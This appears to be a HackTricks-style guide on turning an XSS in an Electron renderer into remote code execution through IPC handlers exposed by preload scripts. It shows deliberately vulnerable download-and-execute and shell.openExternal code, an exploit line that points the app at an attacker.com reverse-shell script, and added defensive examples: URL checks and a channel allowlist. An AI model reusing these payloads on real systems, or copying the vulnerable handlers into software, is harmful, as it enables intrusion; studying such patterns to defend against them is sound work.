Electron contextIsolation RCE via IPC

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If the preload script exposes an IPC channel that main.js listens on, the renderer process can reach that channel, and if the handler behind it is vulnerable, RCE may be possible. contextIsolation stops page JavaScript from touching Node or Electron internals directly, but anything the preload script itself attaches to window (or exposes through contextBridge) is callable from the page, so an XSS in the renderer can invoke it.

Most of these examples were taken from https://www.youtube.com/watch?v=xILfQGkLXQo. Check the video for more details.

Example 0

Example from https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21 (the slides contain a complete walkthrough of how MS Teams was taken from XSS to RCE; this is a very basic example):

Example 1

Note how main.js listens on the getUpdate channel and will download and execute whatever URL it is passed. Note also how preload.js lets the renderer send on any IPC channel to main, so an XSS in the page can reach getUpdate directly.

// Part of code of main.js
const { app, ipcMain } = require('electron')
const fs = require('fs')

// Whoever can send on this channel controls the URL that is downloaded
// and executed below; no origin, scheme or signature check is performed.
ipcMain.on('getUpdate', (event, url) => {
  console.log('getUpdate: ' + url)
  mainWindow.webContents.downloadURL(url)
  mainWindow.download_url = url
});

mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
  console.log('downloads path=' + app.getPath('downloads'))
  console.log('mainWindow.download_url=' + mainWindow.download_url);
  // The file name is taken straight from the attacker-controlled URL
  const url_parts = mainWindow.download_url.split('/')
  const filename = url_parts[url_parts.length-1]
  mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
  console.log('downloadPath=' + mainWindow.downloadPath)
  // Set the save path, making Electron not to prompt a save dialog.
  item.setSavePath(mainWindow.downloadPath)

  item.on('updated', (event, state) => {
    if (state === 'interrupted') {
      console.log('Download is interrupted but can be resumed')
    }
    else if (state === 'progressing') {
      if (item.isPaused()) console.log('Download is paused')
      else console.log(`Received bytes: ${item.getReceivedBytes()}`)
    }
  })

  item.once('done', (event, state) => {
    if (state === 'completed') {
      console.log('Download successful, running update')
      // The downloaded file is made executable and run as-is
      fs.chmodSync(mainWindow.downloadPath, 0o755);
      var child = require('child_process').execFile;
      child(mainWindow.downloadPath, function(err, data) {
        if (err) { console.error(err); return; }
        console.log(data.toString());
      });
    }
    else console.log(`Download failed: ${state}`)
  })
})

// Part of code of preload.js
const { ipcRenderer } = require('electron')

// Generic wrapper: forwards any channel name the page chooses to main
window.electronSend = (event, data) => {
  ipcRenderer.send(event, data);
};

Exploit (JavaScript injected into the renderer via XSS):

<script>
electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
</script>

Example 2

If the preload script directly exposes to the renderer a way to call shell.openExternal, it is easy to get RCE: the URL is handed to the operating system's default handler for its scheme, so it is not limited to http(s) links.

// Part of preload.js code
const { shell } = require('electron')

// The page controls the full URL, including its scheme
window.electronOpenInBrowser = (url) => {
  shell.openExternal(url);
};
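Both sinks above (the getUpdate handler in Example 1 and the openExternal wrapper in Example 2) accept whatever string the renderer supplies. What follows is an added example, not code from the page or from the application in the video, of the checks the main process should apply before acting on such a value. UPDATE_ORIGIN, UPDATE_PATH_PREFIX, checkUpdateUrl and checkExternalUrl are names invented here, and the update origin is a placeholder.

```javascript
// Added example (not from the original page): URL policy checks for the
// two main-process sinks shown above. All names here are this example's
// own, not Electron APIs.

// Assumption (constructed for the example): updates are only ever fetched
// from this origin, under this path prefix.
const UPDATE_ORIGIN = 'https://updates.example.com';
const UPDATE_PATH_PREFIX = '/releases/';

// For the getUpdate handler: the downloaded file gets chmod +x and is
// executed, so the URL must be pinned to the vendor's HTTPS origin and
// path prefix. Returns the normalised URL on success, null on rejection.
function checkUpdateUrl(input) {
  let url;
  try {
    url = new URL(String(input));
  } catch (e) {
    return null;                                   // not an absolute URL
  }
  if (url.protocol !== 'https:') return null;      // no http:, file:, ftp: ...
  if (url.username || url.password) return null;   // https://updates.example.com@evil/
  if (url.origin !== UPDATE_ORIGIN) return null;   // host and port must match exactly
  if (!url.pathname.startsWith(UPDATE_PATH_PREFIX)) return null;
  // The parser already collapses '..' segments (including %2e%2e), but the
  // handler on the page builds a filesystem path from the last segment, so
  // refuse anything that does not yield a plain file name.
  const last = url.pathname.split('/').pop();
  if (!last || last === '.' || last === '..') return null;
  return url.href;
}

// For the openExternal wrapper: only pass http(s) links to the OS. file:,
// smb: and custom protocol handlers would make the OS open a local
// application with attacker-chosen input.
function checkExternalUrl(input) {
  let url;
  try {
    url = new URL(String(input));
  } catch (e) {
    return null;
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}
```

Pinning the origin only removes the renderer's ability to choose the host; an executable fetched over the network should still have its signature verified before it is run. checkExternalUrl deliberately still lets the page open any website, since that is the wrapper's purpose; what it removes is the ability to reach local protocol handlers.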

Example 3

If the preload script exposes a way to communicate freely with the main process, an XSS can send any IPC event and subscribe to any channel. The impact depends on what the main process exposes over IPC.

// Part of preload.js code
const { ipcRenderer } = require('electron')

// Page code can subscribe to any channel and receives the raw IpcRendererEvent
window.electronListen = (event, cb) => {
  ipcRenderer.on(event, cb);
};

// Page code can send on any channel, with any payload
window.electronSend = (event, data) => {
  ipcRenderer.send(event, data);
};
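The fix for the generic wrappers in Example 1 and Example 3 is to expose only an allowlist of channels from the preload and never hand raw ipcRenderer objects to page code. The following is an added example, not code from the page or from the application in the video: makeBridge and the fake ipcRenderer are this example's own constructs, built so that it runs outside Electron. In a real preload you would pass the real ipcRenderer and publish the result with contextBridge.exposeInMainWorld.

```javascript
// Added example (not from the original page): a preload-side IPC wrapper
// that forwards only allowlisted channels, in contrast to the generic
// electronSend/electronListen wrappers above. makeBridge, SEND_ALLOWLIST,
// LISTEN_ALLOWLIST and fakeIpcRenderer are this example's own names.

// Channels the renderer is allowed to send on / subscribe to (constructed
// for the example; a real app lists its own channels here).
const SEND_ALLOWLIST = new Set(['open-settings', 'set-theme']);
const LISTEN_ALLOWLIST = new Set(['theme-changed']);

function makeBridge(ipcRenderer, sendAllow, listenAllow) {
  return {
    // Refuse unknown channels instead of forwarding whatever an XSS asks
    // for (e.g. 'getUpdate').
    send(channel, payload) {
      if (!sendAllow.has(channel)) {
        throw new Error(`ipc send to channel "${channel}" is not allowed`);
      }
      ipcRenderer.send(channel, payload);
    },
    // Subscribe only to allowlisted channels, and pass the callback only the
    // data: Electron's IpcRendererEvent carries a `sender` that is the
    // IpcRenderer instance itself, so exposing the event would hand the page
    // an unrestricted ipcRenderer even if send() is allowlisted.
    on(channel, cb) {
      if (!listenAllow.has(channel)) {
        throw new Error(`ipc listen on channel "${channel}" is not allowed`);
      }
      ipcRenderer.on(channel, (_event, ...args) => cb(...args));
    },
  };
}

// --- constructed stand-in for electron's ipcRenderer (not the real module) ---
function fakeIpcRenderer() {
  const sent = [];
  const listeners = new Map();
  return {
    sent,                                                // what reached "main"
    send(channel, payload) { sent.push({ channel, payload }); },
    on(channel, fn) { listeners.set(channel, fn); },
    // Simulate the main process pushing an event to the renderer
    emit(channel, ...args) {
      const fn = listeners.get(channel);
      if (fn) fn({ sender: this }, ...args);
    },
  };
}

// Drive the generic wrapper and the allowlisted bridge with the payload from
// the exploit above and report what reached the (fake) main process.
function demo() {
  const ipc = fakeIpcRenderer();
  const unsafe = { send: (ch, d) => ipc.send(ch, d) };   // same as window.electronSend
  const safe = makeBridge(ipc, SEND_ALLOWLIST, LISTEN_ALLOWLIST);
  const payload = 'https://attacker.com/path/to/revshell.sh';

  unsafe.send('getUpdate', payload);                     // forwarded to main
  let blocked = false;
  try { safe.send('getUpdate', payload); } catch (e) { blocked = true; }
  safe.send('set-theme', 'dark');                        // allowlisted, forwarded

  let received = null;
  safe.on('theme-changed', (theme) => { received = theme; });
  ipc.emit('theme-changed', 'dark');

  return {
    channels: ipc.sent.map((m) => m.channel),            // ['getUpdate', 'set-theme']
    blocked,                                             // true
    received,                                            // 'dark'
  };
}
```

The allowlist is necessary but not sufficient: it limits which handlers an XSS can reach, and the main-process handlers behind the allowed channels must still validate their own arguments.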